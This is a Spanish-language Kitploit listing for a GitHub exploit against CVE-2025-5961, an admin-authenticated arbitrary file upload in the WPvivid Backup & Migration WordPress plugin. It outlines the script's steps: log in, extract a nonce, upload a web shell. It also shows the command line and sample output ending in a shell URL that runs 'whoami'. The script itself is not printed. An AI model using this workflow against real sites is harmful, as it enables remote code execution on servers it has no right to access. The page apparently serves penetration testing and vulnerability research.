Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-5961 — Migración, Copia de Seguridad, Preparación – WPvivid Backup & Migration <= 0.9.116 - Autenticado (Administrador+) Subida Arbitraria de Archivos | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-5961
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-5961

CVE-2025-5961

Migración, Copia de Seguridad, Preparación – WPvivid Backup & Migration <= 0.9.116 - Autenticado (Administrador+) Subida Arbitraria de Archivos

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 Migración, Copia de seguridad, Staging – WPvivid Backup & Migration <= 0.9.116 - Carga arbitraria de archivos autenticada (Administrador+)

📈 Esta vulnerabilidad afecta a un plugin con más de 700,000+ instalaciones


📝 Detalles del CVE

  • CVE: CVE-2025-5961
  • CVSS: 7.2 (Alta)
  • Publicado: 3 de julio de 2025

🔍 Descripción

El plugin Migration, Backup, Staging – WPvivid Backup & Migration para WordPress es vulnerable a cargas arbitrarias de archivos debido a la falta de validación del tipo de archivo en la función wpvivid_upload_import_files en todas las versiones hasta la 0.9.116 inclusive.

Esto permite a atacantes autenticados (nivel de Administrador y superior) subir archivos arbitrarios al servidor, potencialmente permitiendo la ejecución remota de código.


🧰 Script

Este repositorio contiene un script de exploit para CVE-2025-5961, escrito en Python, que:

  • Comprueba la versión del plugin.
  • Inicia sesión como Administrador.
  • Extrae el nonce requerido de la página del plugin.
  • Sube un payload de web shell.
  • Imprime la URL para acceder a la shell.

🖥️ Ejemplo de uso

root@kitploit:~
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123

⚙️ Uso

root@kitploit:~
$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD

📊 Ejemplo de salida

root@kitploit:~
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/

⚖️ Descargo de responsabilidad

Este script se proporciona solo con fines educativos y de investigación.
El autor no se hace responsable de ningún uso indebido o daño causado por esta herramienta.


✍️ Por

Khaled Alenazi (Nxploited)
🌐 GitHub


Descargar herramienta